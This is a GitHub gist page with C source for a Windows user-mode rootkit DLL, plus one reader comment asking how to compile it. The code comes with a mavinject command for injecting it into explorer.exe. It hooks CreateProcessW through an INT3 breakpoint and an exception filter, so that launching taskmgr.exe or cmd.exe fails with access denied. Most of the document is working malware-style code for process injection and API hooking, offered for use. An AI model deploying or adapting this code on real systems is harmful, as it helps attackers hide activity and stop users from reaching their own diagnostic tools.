Created
December 18, 2017 15:25
-
-
Save anonymous/b25cb82c4b3d40648f0b589fa242577f to your computer and use it in GitHub Desktop.
Simple UserMode Hook Example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe | |
| // mavinject 666 /INJECTRUNNING C:\Tools\Injectable.dll | |
| // | |
| BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) { | |
| DWORD dwOldProt = 0; | |
| if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE) | |
| return FALSE; | |
| MoveMemory(fpFunc, b, size); | |
| return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt); | |
| } | |
| VOID HookFunction(VOID) { | |
| fpCreateProcessW = GetProcAddress(LoadLibrary(L"kernel32"), "CreateProcessW"); | |
| if (fpCreateProcessW == NULL) { | |
| return; | |
| } | |
| bSavedByte = *(LPBYTE)fpCreateProcessW; | |
| const BYTE bInt3 = 0xCC; | |
| if (WriteMemory(fpCreateProcessW, &bInt3, sizeof(BYTE)) == FALSE) { | |
| ExitThread(0); | |
| } | |
| } | |
| BOOL WINAPI MyCreateProcessW(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation) { | |
| if (wcsstr(lpCommandLine, L"taskmgr.exe") != NULL || | |
| wcsstr(lpCommandLine, L"cmd.exe") != NULL) { | |
| SetLastError(ERROR_ACCESS_DENIED); | |
| return FALSE; | |
| } | |
| if (WriteMemory(fpCreateProcessW, &bSavedByte, sizeof(BYTE)) == FALSE) { | |
| ExitThread(0); | |
| } | |
| BOOL b = CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation); | |
| HookFunction(); | |
| return b; | |
| } | |
| LONG WINAPI MyUnhandledExceptionFilter(LPEXCEPTION_POINTERS lpException) { | |
| if (lpException->ContextRecord->Rip == (DWORD_PTR)fpCreateProcessW) | |
| lpException->ContextRecord->Rip = (DWORD_PTR)MyCreateProcessW; | |
| return EXCEPTION_CONTINUE_EXECUTION; | |
| } | |
| BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) { | |
| switch (fdwReason) { | |
| case DLL_PROCESS_ATTACH: | |
| SetUnhandledExceptionFilter((LPTOP_LEVEL_EXCEPTION_FILTER)MyUnhandledExceptionFilter); | |
| ::MessageBoxA(NULL,"Boom!","Injected",0); | |
| HookFunction(); | |
| break; | |
| } | |
| return TRUE; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
How I must compile it? I've compiled it in MS Visual Studio clear project and it does't works.